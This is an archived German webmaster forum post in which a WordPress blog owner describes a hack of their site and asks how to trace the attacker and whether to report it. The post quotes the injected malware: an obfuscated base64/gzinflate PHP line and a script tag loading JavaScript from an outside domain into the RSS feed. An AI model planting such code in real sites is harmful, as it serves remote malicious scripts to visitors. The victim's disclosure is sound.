Du befindest Dich im Archiv vom ABAKUS Online Marketing Forum. Hier kannst Du Dich für das Forum mit den aktuellen Beiträgen registrieren.

Gehackt - Angriff zurück verfolgen?

Forum rund um das Thema Hardware für Webmaster.
Neues Thema Antworten
Liberty
PostRank 4
PostRank 4
Beiträge: 105
Registriert: 21.12.2010, 21:04

Beitrag von Liberty » 04.03.2012, 15:39

Hallo, durch Zufall bin ich auf einen Hackingangriff auf meinen Wordpress Blog aufmerksam geworden. Irgendjemand hat ich Zugang auf meinen Webspace verschafft und einige Dateien geändert. Eingefügt wurde immer der Selbe Base64 Schadcode:

Code: Alles auswählen

#b58b6f#
echo(gzinflate(base64_decode(“JctRCoAgDADQq8gO4P5DvcuwRUm hbKPl7fvw98FLWuUaFmwOzmD8GTZ6aSkElZrhNBsborvHnab2Y3a RWPuDwjeTcmwKJeFK5Qc=”)));
#/b58b6f#
Und in meinen RSS Feed wurde ein JS eingefügt:

Code: Alles auswählen

<script type=”text/javascript” src=”http&#58;//www.daysofyorr.com/release.js”></script><script type=”text/javascript” src=”http&#58;//www.daysofyorr.com/release.js”></script>
Der Angriff fand am 29.2. gegen 2:30 Uhr statt. Die manipulierten Dateien habe ich schnell bereinigt und alle Passwörter geändert. Über die Server Log habe ich die IP des Angreifer herausgefunden. Dabei handelt es sich um einen Server von Hetzner.

Über Google habe ich außerdem herausgefunden, dass mehrere Seiten zur selben Zeit infiziert wurden.

Wie kann ich herausfinden, wie dem Hacker der Angriff gelang? Und meint ihr eine Anzeige würde etwas bringen? Ich glaube ja der Hetzner Server wurde gehackt und missbraucht. Der Hacker wird bestimmt irgendwo im Ausland sitzen. Als Beweis habe ich ein komplettes Backup.